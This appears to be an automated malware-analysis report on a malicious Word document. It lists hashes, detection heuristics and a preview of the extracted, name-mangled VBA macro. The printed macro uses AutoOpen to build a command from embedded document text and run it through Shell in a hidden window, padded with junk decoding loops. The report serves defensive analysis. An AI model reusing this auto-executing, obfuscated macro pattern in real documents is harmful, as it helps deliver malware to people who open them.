Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e68125b87c26994e…

MALICIOUS

Office (OLE)

85.6 KB Created: 2018-11-14 18:30:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: 117a844e3316355a212f072b690e8b64 SHA-1: e4ea826bdabe97a0903cb5f76aa45698566bd645 SHA-256: e68125b87c26994e9356cc2bc7e31ae6e3a16a8ec86975307efb481e1e927391
252 Risk Score

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6749944-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6749944-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    zUJFlJicq = Shell(kXzni + jnkzvjvW + EjjUhYd, ilZctzzmKUn)
   Dim ZUzhiii, ndAFu, CKBzNOJ, LvXibGJN
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
Sub AutoOpen()
   Dim kKwwkmRTw, AmOwL, PIIsz, PYwFBdB
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4966 bytes
SHA-256: 769ed2f6feab58cb9fa2002ec0a5ad897f7f3e3b664073f85b8f7f0f4d8a3daf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
47 of 75 identifiers look randomly generated (e.g. 'ilZctzzmKUn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FDMNzTmiz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hjJDmiUNU()
Const ilZctzzmKUn = 607169607 - 607169607
   Dim bZqnv, EBdjvizJc, NZClznP, PDzqZUwL
    EBdjvizJc = Len(VwGrCs)
    PDzqZUwL = ""
    For bZqnv = 1 To EBdjvizJc
        PDzqZUwL = PDzqZUwL & (32 + ((NZClznP + 36) Mod 136))
        If NZClznP >= 22 And NZClznP <= 73 Then
            PDzqZUwL = PDzqZUwL & (37 + ((NZClznP + 46) Mod 147))
        Else
            PDzqZUwL = PDzqZUwL & (NZClznP)
        End If
    Next
tnKUAwIFn = PDzqZUwL

   Dim YrAOc, jkRiL, hKhqEaY, qCHDCOAwO
    jkRiL = Len(PKzii)
    qCHDCOAwO = ""
    For YrAOc = 1 To jkRiL
        qCHDCOAwO = qCHDCOAwO & (39 + ((hKhqEaY + 46) Mod 132))
        If hKhqEaY >= 33 And hKhqEaY <= 93 Then
            qCHDCOAwO = qCHDCOAwO & (15 + ((hKhqEaY + 48) Mod 174))
        Else
            qCHDCOAwO = qCHDCOAwO & (hKhqEaY)
        End If
    Next
vRhSd = qCHDCOAwO

kXzni = "" + DfOJR + wLNInWJ + Shapes("zZuNbQu").TextFrame.ContainingRange + Ywfjf + SSkHpVk
   Dim dHEkwnQJR, Gjwtjm, htiim, QzwrhOu
    Gjwtjm = Len(acRJOEi)
    QzwrhOu = ""
    For dHEkwnQJR = 1 To Gjwtjm
        QzwrhOu = QzwrhOu & (48 + ((htiim + 38) Mod 76))
        If htiim >= 10 And htiim <= 80 Then
            QzwrhOu = QzwrhOu & (43 + ((htiim + 13) Mod 115))
        Else
            QzwrhOu = QzwrhOu & (htiim)
        End If
    Next
wUZBUmoq = QzwrhOu

zUJFlJicq = Shell(kXzni + jnkzvjvW + EjjUhYd, ilZctzzmKUn)
   Dim ZUzhiii, ndAFu, CKBzNOJ, LvXibGJN
    ndAFu = Len(tXimNMW)
    LvXibGJN = ""
    For ZUzhiii = 1 To ndAFu
        LvXibGJN = LvXibGJN & (12 + ((CKBzNOJ + 38) Mod 96))
        If CKBzNOJ >= 49 And CKBzNOJ <= 99 Then
            LvXibGJN = LvXibGJN & (21 + ((CKBzNOJ + 13) Mod 79))
        Else
            LvXibGJN = LvXibGJN & (CKBzNOJ)
        End If
    Next
ZZRYBVsJB = LvXibGJN

   Dim IXLkAbSjt, mjUFT, RtEowasc, topjn
    mjUFT = Len(LhKETU)
    topjn = ""
    For IXLkAbSjt = 1 To mjUFT
        topjn = topjn & (29 + ((RtEowasc + 31) Mod 115))
        If RtEowasc >= 34 And RtEowasc <= 81 Then
            topjn = topjn & (41 + ((RtEowasc + 21) Mod 108))
        Else
            topjn = topjn & (RtEowasc)
        End If
    Next
BvjaQm = topjn

End Function
Sub AutoOpen()
   Dim kKwwkmRTw, AmOwL, PIIsz, PYwFBdB
    AmOwL = Len(dTWzLEJ)
    PYwFBdB = ""
    For kKwwkmRTw = 1 To AmOwL
        PYwFBdB = PYwFBdB & (16 + ((PIIsz + 30) Mod 88))
        If PIIsz >= 22 And PIIsz <= 63 Then
            PYwFBdB = PYwFBdB & (47 + ((PIIsz + 37) Mod 156))
        Else
            PYwFBdB = PYwFBdB & (PIIsz)
        End If
    Next
MXmqGEuz = PYwFBdB

   Dim cwaEG, LpoziJbt, vKsaKANk, HVWNtELM
    LpoziJbt = Len(isjJwwPHk)
    HVWNtELM = ""
    For cwaEG = 1 To LpoziJbt
        HVWNtELM = HVWNtELM & (16 + ((vKsaKANk + 29) Mod 119))
        If vKsaKANk >= 21 And vKsaKANk <= 73 Then
            HVWNtELM = HVWNtELM & (41 + ((vKsaKANk + 40) Mod 97))
        Else
            HVWNtELM = HVWNtELM & (vKsaKANk)
        End If
    Next
wwJioGPM = HVWNtELM

hjJDmiUNU
   Dim hCpCRoMlw, lzMZn, ccrzNqVSC, vOKXtbh
    lzMZn = Len(IUmfpF)
    vOKXtbh = ""
    For hCpCRoMlw = 1 To lzMZn
        vOKXtbh = vOKXtbh & (37 + ((ccrzNqVSC + 15) Mod 183))
        If ccrzNqVSC >= 19 And ccrzNqVSC <= 87 Then
            vOKXtbh = vOKXtbh & (47 + ((ccrzNqVSC + 33) Mod 180))
        Else
            vOKXtbh = vOKXtbh & (ccrzNqVSC)
        End If
    Next
GAsJMWI = vOKXtbh

   Dim kIMiG, XwfuRnZhI, TWacwjkC, THTBs
    XwfuRnZhI = Len(NMHYGikM)
    THTBs = ""
    For kIMiG = 1 To XwfuRnZhI
        THTBs = THTBs & (21 + ((TWacwjkC + 28) Mod 52))
        If TWacwjkC >= 41 And TWacwjkC <= 80 Then
            THTBs = THTBs & (35 + ((TWacwjkC + 41) Mod 71))
        Else
            THTBs = THTBs & (TWacwjkC)
        End If
    Next
kBibLr = THTBs

   Dim jXzptwaaP, PBQSJz, lrXZmpjB, NSOhEYdS
    PBQSJz = Len(PfAMJOqT)
    NSOhEYdS = ""
    For jXzptwaaP = 1 To PBQSJz
        NSOhEYdS = NSOhEYdS & (48 + ((lrXZmpjB + 27) Mod 61))
        If lrXZmpjB >= 23 And lrXZmpjB <= 95 Then
            NSOhEYdS = NSOhEYdS & (15 + ((lrXZmpjB + 29) Mod 186))
        Else
            NSOhEYdS = NSOhEYdS & (lrXZmpjB)
        End If
    Next
kRJQuhS = NSOhEYdS

   Dim ziknRXY, QOkHtbnR, KYJklV, GOiWPbBz
    QOkHtbnR = Len(jpqFp)
    GOiWPbBz = ""
    For ziknRXY = 1 To QOkHtbnR
        GOiWPbBz = GOiWPbBz & (33 + ((KYJklV + 31) Mod 124))
        If KYJklV >= 23 And KYJklV <= 59 Then
            GOiWPbBz = GOiWPbBz & (34 + ((KYJklV + 11) Mod 72))
        Else
            GOiWPbBz = GOiWPbBz & (KYJklV)
        End If
    Next
PTmjnolpN = GOiWPbBz

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.